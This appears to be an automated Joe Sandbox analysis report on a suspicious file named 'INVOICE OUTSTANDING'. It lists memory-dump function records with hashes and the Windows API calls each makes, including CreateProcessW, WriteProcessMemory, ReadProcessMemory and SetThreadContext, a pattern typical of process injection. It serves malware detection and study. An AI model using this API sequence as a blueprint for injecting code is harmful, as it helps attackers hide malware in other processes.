Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
(Control-flow graph for basic blocks 78b625b-78b6815; the rendered graph and its Executed/Not Executed colouring are not preserved in this export. Block 78b6412 makes two internal calls, to 78b69c9 and 78b69d8; the graph dump contains no API-call nodes.)
Strings
Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: `q~'
• API String ID: 0-1541917547
• Opcode ID: 3874c77dca492611c6dfe1afc39ed7feac86c94dc6004ac606e9b2408b9f939e
• Instruction ID: 8295895d954a4385e968391fd34521d329f0fc68e2db73d034ae75f1c99c930f
• Opcode Fuzzy Hash: 3874c77dca492611c6dfe1afc39ed7feac86c94dc6004ac606e9b2408b9f939e
• Instruction Fuzzy Hash: 5B024AB1A1520ADFCB14CF99D4818EEFBB2FF59300B24946AD506EB315E734A952CF90
Uniqueness
Uniqueness Score: -1.00%

Control-flow Graph
(Control-flow graph for basic blocks 78b63a8-78b6815; the rendered graph and its Executed/Not Executed colouring are not preserved in this export. Block 78b6412 makes two internal calls, to 78b69c9 and 78b69d8; the graph dump contains no API-call nodes.)
Strings
Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: `q~'
• API String ID: 0-1541917547
• Opcode ID: e1b6cde1a378b20e2543c40a692e40bb3090e11b3ddd64bb37d8f9d2f7d52cf2
• Instruction ID: e7f1d697452a841a4af392ec829a36501d6a725b9bbfdc4f7a9107294f0f2a1c
• Opcode Fuzzy Hash: e1b6cde1a378b20e2543c40a692e40bb3090e11b3ddd64bb37d8f9d2f7d52cf2
• Instruction Fuzzy Hash: A1D127B0E1460ADFCB54CF95C4818AEFBB2FF99300F14D569D616AB314E734AA428F94
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: OgW
• API String ID: 0-2993439660
• Opcode ID: 747c5d80c001cbeacf47fa533629a833a7ef7517b9a41bb6e64370ba3f18146a
• Instruction ID: 2759afb2758bbf1659f89d31bdf8087e9c0e68b83555be0fadee7c9a74ac8508
• Opcode Fuzzy Hash: 747c5d80c001cbeacf47fa533629a833a7ef7517b9a41bb6e64370ba3f18146a
• Instruction Fuzzy Hash: DBA126B0E142199BCB18CFA9C5845DEFBF2BF99304F14D16AD418EB358D734A942CBA4
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: 6p{k
• API String ID: 0-3059615964
• Opcode ID: 5613543dd110d3d3e81dfea93e2f65284faaac12ba482604d4e66369cb3f49ad
• Instruction ID: ce6a77d1aed517bc106bef5cb3d9fbc878b9f141afb9dc6896bbf28c1af6f5ec
• Opcode Fuzzy Hash: 5613543dd110d3d3e81dfea93e2f65284faaac12ba482604d4e66369cb3f49ad
• Instruction Fuzzy Hash: 34613771D0466ACFDB29CF65CC40B9ABBB2AF89300F1481EAD148AB655EB705A85CF50
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: 6p{k
• API String ID: 0-3059615964
• Opcode ID: c9f96b68a77961b5d27e25aad1e0ffec536f0623aa65bfc65536e24cfc36e960
• Instruction ID: 68ebd18f3281e255336f9b6178087b4a102503da9a2ab307c6030f386d417758
• Opcode Fuzzy Hash: c9f96b68a77961b5d27e25aad1e0ffec536f0623aa65bfc65536e24cfc36e960
• Instruction Fuzzy Hash: 22515771E1462ACBDB28CF65CD40BDDBBB6BFD8300F1082AAD50DA6654EB705A848F40
Uniqueness
Uniqueness Score: -1.00%

Strings
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID:
• String ID: 6p{k
• API String ID: 0-3059615964
• Opcode ID: 8a787c4b67e11605d046ec70ae30ab8afe913b7a6fa34d7fd36dcc349b7994eb
• Instruction ID: 7627b6ba874bf2bc4aae195eacc83c3ace644f2995d52fb27974cfbb4545817c
• Opcode Fuzzy Hash: 8a787c4b67e11605d046ec70ae30ab8afe913b7a6fa34d7fd36dcc349b7994eb
• Instruction Fuzzy Hash: 2C510775D5162ACBDB64CF64C980BDDB7B2FB98300F1096EAD109A6654EB70AAC4CF40
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: Zz4:
                                                                                                                          • API String ID: 0-2712991513
                                                                                                                          • Opcode ID: ebf401c2e800aaf40c6b1384b556c56ea5b2c53665af49fba33c14ea634cc114
                                                                                                                          • Instruction ID: 8de4a5259fd4d3b01871e014dc32cd31e4db7e0e00eb30a83f590c1f95407640
                                                                                                                          • Opcode Fuzzy Hash: ebf401c2e800aaf40c6b1384b556c56ea5b2c53665af49fba33c14ea634cc114
                                                                                                                          • Instruction Fuzzy Hash: C5415970E05318DFCB14CFA4D9C499EFFB6AF89311F24682AD116B7659D334A582CB04
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: 6p{k
                                                                                                                          • API String ID: 0-3059615964
                                                                                                                          • Opcode ID: cc1f20292b5350921cb231ba079b7857a5c46d415ea898c3c3c657d41ab1c8d7
                                                                                                                          • Instruction ID: 97376c3a4387c94eeb5dc471199d4780e7d663b73887ad22749a15e1cc12d75f
                                                                                                                          • Opcode Fuzzy Hash: cc1f20292b5350921cb231ba079b7857a5c46d415ea898c3c3c657d41ab1c8d7
                                                                                                                          • Instruction Fuzzy Hash: 20512670D5062ACFDB74CF64CD80BDDB7B2BB98300F1096EAD149A6654EB706AC48F40
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: add84da65163704c54b3340edcff9b26b032253bcfefdf7d7f38b5964e3f96fc
                                                                                                                          • Instruction ID: 8ed6484cc245329f7b4faaeff41f7f3dd30453ff88623b01d31c4a497cf7c5e8
                                                                                                                          • Opcode Fuzzy Hash: add84da65163704c54b3340edcff9b26b032253bcfefdf7d7f38b5964e3f96fc
                                                                                                                          • Instruction Fuzzy Hash: E2A1E2B4E14209CFDB14CFA9D8909DEBBB2EF89310F24812AE415EB754DB34A956CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 603fa41c5e4df01c79cca8dd2839678b3ea945c954b85caab9fac468524e5d1a
                                                                                                                          • Instruction ID: 7949136c75427ca8bcb9c79dbaf058400f29538bbda849157f4163ecb5ff6012
                                                                                                                          • Opcode Fuzzy Hash: 603fa41c5e4df01c79cca8dd2839678b3ea945c954b85caab9fac468524e5d1a
                                                                                                                          • Instruction Fuzzy Hash: 2981C1B4E10619CFDB18CFA9C994AEEBBB2FF89300F10912AD519AB354DB345946CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: 1602ab6c3bfe7ffa8246c769305c90713cd0de62bbb3512289b94bb8640617db
                                                                                                                          • Instruction ID: 49fe46d0bbc0be2247b4afdf527c5300d80cba307f6b8f43582479d0c7a95069
                                                                                                                          • Opcode Fuzzy Hash: 1602ab6c3bfe7ffa8246c769305c90713cd0de62bbb3512289b94bb8640617db
                                                                                                                          • Instruction Fuzzy Hash: 61415CB1E01618CBDB28DF6B9D4569AFAF3BFC9200F14C1BA950CA6214DB341A868E11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b5b4de607d5845162fdfa66dae0ed73dc889a170207a97415821044b9f37d655
                                                                                                                          • Instruction ID: 7021d45f06adce11fa14bb89e794cc7945d03f6e1248201eb4608d5a9fc53bbc
                                                                                                                          • Opcode Fuzzy Hash: b5b4de607d5845162fdfa66dae0ed73dc889a170207a97415821044b9f37d655
                                                                                                                          • Instruction Fuzzy Hash: 35412DB1E01618CBDB68DF6B9D4578AFAF3BFC8200F14C1BA950CA6254DB3409858F11
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: b417989db5093ee6cb23d6103c3872adb01edb2ff33fd91616979bbdfe075571
                                                                                                                          • Instruction ID: c59e2875157793dba6b9785cca03134501fa285cf0d87d3d5e628723c515f219
                                                                                                                          • Opcode Fuzzy Hash: b417989db5093ee6cb23d6103c3872adb01edb2ff33fd91616979bbdfe075571
                                                                                                                          • Instruction Fuzzy Hash: A121D6B1E006188BEB18CF9AD8447DEBBF3AFC9310F14C16AD509A6258DB741A55CF51
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.351130975.00000000078B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 078B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_78b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: d4ec51260e90e20160d8ff0607d655f3614e6e41232c93fd0abad94a44b450f1
                                                                                                                          • Instruction ID: 4ed9faffd959565b5059d1f85d0f3c3381e16db6c61ee635ac1ab9ef524e2480
                                                                                                                          • Opcode Fuzzy Hash: d4ec51260e90e20160d8ff0607d655f3614e6e41232c93fd0abad94a44b450f1
                                                                                                                          • Instruction Fuzzy Hash: 3C21B4B1E006188BEB18CFAAD8547DEBFF3AFC9310F14C169D409A6258DB745956CF50
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID:
                                                                                                                          • API String ID:
                                                                                                                          • Opcode ID: a4e7fcf19630235295d6fa4bdddf26aa304af11a382b3ad5b518ab013a01c752
                                                                                                                          • Instruction ID: 43965d666e141a9825ba42663b82defa2982ebe94cbb10c1793b28904378fa14
                                                                                                                          • Opcode Fuzzy Hash: a4e7fcf19630235295d6fa4bdddf26aa304af11a382b3ad5b518ab013a01c752
                                                                                                                          • Instruction Fuzzy Hash: 1021DF71C04268CFCB108FA4D4587EEBBF0AB8E306F15446AD041B7281D7748948CB68
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBAD0
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 014BBB0D
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBB4A
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 014BBBA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: e3a052cdc9c60244072f7ceee07d3852b2c1c92140f3a79b4addc310f99dfbf4
                                                                                                                          • Instruction ID: 517b4b0f72b9df84e466a723ab40dfc27bbd74fdf0460ea4f9404f16554f5623
                                                                                                                          • Opcode Fuzzy Hash: e3a052cdc9c60244072f7ceee07d3852b2c1c92140f3a79b4addc310f99dfbf4
                                                                                                                          • Instruction Fuzzy Hash: 045163B49007488FDB14CFA9C998BDEBFF0EB48304F24805AE409A77A1DB74A944CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBAD0
                                                                                                                          • GetCurrentThread.KERNEL32 ref: 014BBB0D
                                                                                                                          • GetCurrentProcess.KERNEL32 ref: 014BBB4A
                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 014BBBA3
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: Current$ProcessThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 2063062207-0
                                                                                                                          • Opcode ID: 07cca4abb6a791cd2800db0965590348ac0e16bede1d1890cc4f5884a5a3fbb1
                                                                                                                          • Instruction ID: b19081d9ca0deb0025a887d50f6830fe328d17808f37037cdcdb5593e323f86c
                                                                                                                          • Opcode Fuzzy Hash: 07cca4abb6a791cd2800db0965590348ac0e16bede1d1890cc4f5884a5a3fbb1
                                                                                                                          • Instruction Fuzzy Hash: FF5153B49007498FDB14CFAAC998BDEBBF0EF48314F20805AE019A77A0DB749944CF65
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph

                                                                                                                          APIs
                                                                                                                          • GetModuleHandleW.KERNELBASE(00000000), ref: 014B99CE
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: HandleModule
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 4139908857-0
                                                                                                                          • Opcode ID: 00610444733cc6a92e00ace2b91efa24a552ea4ee668aafb81bdfb38a3a249c7
                                                                                                                          • Instruction ID: ad88f08e3b976da3c99aa8b9e8fa4a5af7a94986f071d567776f4df790002522
                                                                                                                          • Opcode Fuzzy Hash: 00610444733cc6a92e00ace2b91efa24a552ea4ee668aafb81bdfb38a3a249c7
                                                                                                                          • Instruction Fuzzy Hash: F47108B0A10B058FD724DF2AD49479BBBF5BF88208F10892ED54ADBB50D775E805CBA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring is lost in text): basic blocks 832165c-832187c, no internal calls; CreateProcessW is called from block 8321731-83217ce.
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 083217BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: 7aebd76b63017d7d8488e98c331abc9ea4b83aa0644adc833800e95187cd1537
                                                                                                                          • Instruction ID: 2a4b3be49e5f9469a9e84c3e47224b82953e95e7b3d6add127a68ec93e646020
                                                                                                                          • Opcode Fuzzy Hash: 7aebd76b63017d7d8488e98c331abc9ea4b83aa0644adc833800e95187cd1537
                                                                                                                          • Instruction Fuzzy Hash: C0510771D00328DFDB24DF99C980BDDBBB5AF88314F148099E808A7650DB75AA89CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring is lost in text): basic blocks 8321668-832187c, the same function body as the preceding record entered at 8321668; CreateProcessW is called from block 8321731-83217ce.
                                                                                                                          APIs
                                                                                                                          • CreateProcessW.KERNELBASE(?,?,00000009,?,?,?,?,?,?,?), ref: 083217BB
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: CreateProcess
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 963392458-0
                                                                                                                          • Opcode ID: 84c6063aac203641226709bb802aeebc192ed3ea8d79ac49dc8c2131a806f3d9
                                                                                                                          • Instruction ID: 7f81030acb79c5e40d86318503348af12ce1f3d8ba8bec6324eaa8919fc707bf
                                                                                                                          • Opcode Fuzzy Hash: 84c6063aac203641226709bb802aeebc192ed3ea8d79ac49dc8c2131a806f3d9
                                                                                                                          • Instruction Fuzzy Hash: 73510771D00329DFDB24DF99C980BDDBBB5BF88314F148099E808A7650DB71AA89CF61
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring is lost in text): basic blocks 8321c08-8321cd4; WriteProcessMemory is called from block 8321c71-8321caa.
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08321C9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 62b20de9d9d5ea479023e72eb3c139b44622c9de558cd7f63263cfe29e2e77fd
                                                                                                                          • Instruction ID: f8d1b32429f03c7fdd7b57f54e811a6b811a04c2e0bb1faef26ec13ce7c87043
                                                                                                                          • Opcode Fuzzy Hash: 62b20de9d9d5ea479023e72eb3c139b44622c9de558cd7f63263cfe29e2e77fd
                                                                                                                          • Instruction Fuzzy Hash: EC2105B5900259DFCB10CF9AC985BDEBBF4FB48310F108429E818A3750D774AA54CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring is lost in text): basic blocks 83219d0-8321a86; SetThreadContext is called from block 8321a47-8321a5c.
                                                                                                                          APIs
                                                                                                                          • SetThreadContext.KERNELBASE(?,00000000), ref: 08321A4F
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: ContextThread
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1591575202-0
                                                                                                                          • Opcode ID: d5a3475615413d53c1450d045278f34e7cc765b1c2cb54b1ae14950c8dfa872b
                                                                                                                          • Instruction ID: 380341ba633c6918367a1034aec1b161bdfde3f1096bdb3ee66f3805d8884911
                                                                                                                          • Opcode Fuzzy Hash: d5a3475615413d53c1450d045278f34e7cc765b1c2cb54b1ae14950c8dfa872b
                                                                                                                          • Instruction Fuzzy Hash: C3216AB1D002599FCB00CF9AC5857DEFBF8BB89610F14816AE418B3741D774A944CFA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring is lost in text): basic blocks 8321c10-8321cd4, the same function body as the earlier WriteProcessMemory record entered at 8321c10; WriteProcessMemory is called from block 8321c71-8321caa.
                                                                                                                          APIs
                                                                                                                          • WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 08321C9D
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessWrite
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3559483778-0
                                                                                                                          • Opcode ID: 96c6c7aeca54d915a38661c1e3464031fb1287df7eb3b6267abcafb685f007fa
                                                                                                                          • Instruction ID: 4520bcb310757eede07c81243db15383a1c5df519bdc47cd13a1f92facc404b2
                                                                                                                          • Opcode Fuzzy Hash: 96c6c7aeca54d915a38661c1e3464031fb1287df7eb3b6267abcafb685f007fa
                                                                                                                          • Instruction Fuzzy Hash: F421E4B5900359DFCB10CF9AC985BDEBBF4FB48314F10852AE918A3750D778A944CBA4
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Control-flow Graph (rendered graph not reproduced; executed/not-executed colouring is lost in text): basic blocks 14bc099-14bc15a; DuplicateHandle is called from block 14bc0a0-14bc134.
                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BC127
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: aa8b7b569a41bf4e5bac32016fc88a16fdd0e96e61020662f2e5037fe7d8e5c1
                                                                                                                          • Instruction ID: a5a501a36779c88db366334e2c0f2781210395b6bc18d8a521c105db0e2875f5
                                                                                                                          • Opcode Fuzzy Hash: aa8b7b569a41bf4e5bac32016fc88a16fdd0e96e61020662f2e5037fe7d8e5c1
                                                                                                                          • Instruction Fuzzy Hash: BB21C6B5900258AFDB10DF9AD984ADEFBF4EB48324F14841AE954B7710D374A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 014BC127
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.326548559.00000000014B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014B0000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_14b0000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: DuplicateHandle
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 3793708945-0
                                                                                                                          • Opcode ID: 773d12fb36ea0e6e567aeeb375b7fbb6418e97eae60ef0de4e8f31bb905f578e
                                                                                                                          • Instruction ID: d59e70770a5f63718c15a4c81de120c48256afa8a7b510418b4114568fb8e7eb
                                                                                                                          • Opcode Fuzzy Hash: 773d12fb36ea0e6e567aeeb375b7fbb6418e97eae60ef0de4e8f31bb905f578e
                                                                                                                          • Instruction Fuzzy Hash: F421C4B5900258AFDB10CF9AD884ADEFBF8EB48324F14841AE954B7710D374A944CFA1
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08321B17
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
                                                                                                                          Similarity
                                                                                                                          • API ID: MemoryProcessRead
                                                                                                                          • String ID:
                                                                                                                          • API String ID: 1726664587-0
                                                                                                                          • Opcode ID: 5085cc8246d14ad68c3cc38a3a9d31b5c9f95e62e5b66668320995012b04e60a
                                                                                                                          • Instruction ID: d245720b7cc42156c9b1070fd6340e622ad44bd148a79ed7fee91f26380c8212
                                                                                                                          • Opcode Fuzzy Hash: 5085cc8246d14ad68c3cc38a3a9d31b5c9f95e62e5b66668320995012b04e60a
                                                                                                                          • Instruction Fuzzy Hash: A721E2B6901259DFCB10CF9AD984BDEBBF4BB48310F10842AE558A3650D374A954CBA0
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          APIs
                                                                                                                          • ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 08321B17
Memory Dump Source
• Source File: 00000000.00000002.352700809.0000000008320000.00000040.00000800.00020000.00000000.sdmp, Offset: 08320000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_8320000_INVOICE OUTSTANDING.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID:
• API String ID: 1726664587-0
• Opcode ID: 5dd0854dd5374bf027aea9a47a66a138df773c16650d6738511c5d117bf7d350
